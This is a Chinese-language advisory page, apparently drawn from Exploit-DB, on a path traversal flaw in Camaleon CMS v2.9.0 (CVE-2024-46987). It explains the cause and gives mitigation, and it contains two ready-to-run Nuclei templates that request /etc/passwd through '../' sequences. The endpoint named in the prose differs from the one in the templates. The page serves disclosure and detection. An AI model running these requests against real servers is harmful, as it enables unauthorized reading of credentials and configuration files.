[webapps] Camaleon CMS v2.9.0 - Path Traversal
CVE-2024-46987
Camaleon CMS v2.9.0 存在路径遍历漏洞,攻击者可读取任意文件。
High · CVSS 7.5📋 漏洞基础信息
| CVE | CVE-2024-46987 |
|---|---|
| 漏洞类型 | 路径遍历 |
| 受影响版本 | Camaleon CMS v2.9.0 |
| 危害等级 | High · CVSS 7.5 |
| 发布日期 | 2026-04-30 |
| 提交者 | Sakshi Velampudi (CyberQuestor) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在`app/controllers/camaleon_cms/media_controller.rb`中,文件下载功能未对用户输入的`file_path`参数进行充分验证,允许包含`../`等路径穿越序列,导致可读取服务器上的任意文件。
🎯 攻击场景
1. 前置条件:需要已登录的有效用户会话。 2. 攻击者构造包含路径遍历序列的请求,例如:`GET /media/download?file_path=../../../etc/passwd`。 3. 服务器返回被请求文件的内容,从而造成信息泄露。
💥 漏洞影响
攻击者可读取服务器上的任意文件,包括配置文件、数据库凭证、源代码等敏感信息,导致信息泄露,可能进一步引发权限提升或横向移动。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2024-46987-exploit
info:
name: Camaleon CMS Path Traversal Exploit
author: sakshi-velampudi
severity: high
description: Camaleon CMS v2.9.0 and earlier is vulnerable to path traversal through the private file download endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-46987
- https://www.exploit-db.com/exploits/52048
tags: cve,cve2024,camaleon,cms,path-traversal
variables:
auth_token: "{{token}}"
file_path: "etc/passwd"
http:
- method: GET
path:
- "{{BaseURL}}/admin/login"
headers:
Cookie: "auth_token={{auth_token}}"
matchers:
- type: word
words:
- "Camaleon CMS"
- "camaleon-cms"
condition: or
case-insensitive: true
extractors:
- type: regex
name: version
part: body
regex:
- 'Camaleon CMS v(\d+\.\d+\.\d+)'
- method: GET
path:
- "{{BaseURL}}/admin/media/download_private_file?file=../../../../../../{{file_path}}"
headers:
Cookie: "auth_token={{auth_token}}"
matchers:
- type: word
words:
- "root:x:0:0"
- "daemon:x:1:1"
- "www-data:x:33:33"
condition: or
case-insensitive: true
extractors:
- type: regex
name: file_content
part: body
regex:
- '(.*)'🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2024-46987-detection
info:
name: Camaleon CMS Path Traversal Detection
author: sakshi-velampudi
severity: high
description: Camaleon CMS v2.9.0 and earlier is vulnerable to path traversal through the private file download endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-46987
- https://www.exploit-db.com/exploits/52048
tags: cve,cve2024,camaleon,cms,path-traversal
http:
- method: GET
path:
- "{{BaseURL}}/admin/login"
matchers:
- type: word
words:
- "Camaleon CMS"
- "camaleon-cms"
condition: or
case-insensitive: true
extractors:
- type: regex
name: version
part: body
regex:
- 'Camaleon CMS v(\d+\.\d+\.\d+)'
- type: regex
name: version_meta
part: body
regex:
- 'v(\d+\.\d+\.\d+)'
- method: GET
path:
- "{{BaseURL}}/admin/media/download_private_file?file=../../../../../../etc/passwd"
matchers:
- type: word
words:
- "root:x:0:0"
- "daemon:x:1:1"
condition: or
case-insensitive: true
extractors:
- type: regex
name: vulnerable
part: body
regex:
- 'root:.*:0:0:'🛡️ 修复建议
升级至修复该漏洞的版本(如后续补丁版本);临时缓解措施:在`MediaController`中对`file_path`参数进行白名单验证或限制路径只能在媒体目录内。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:30 | 来源: Exploit-DB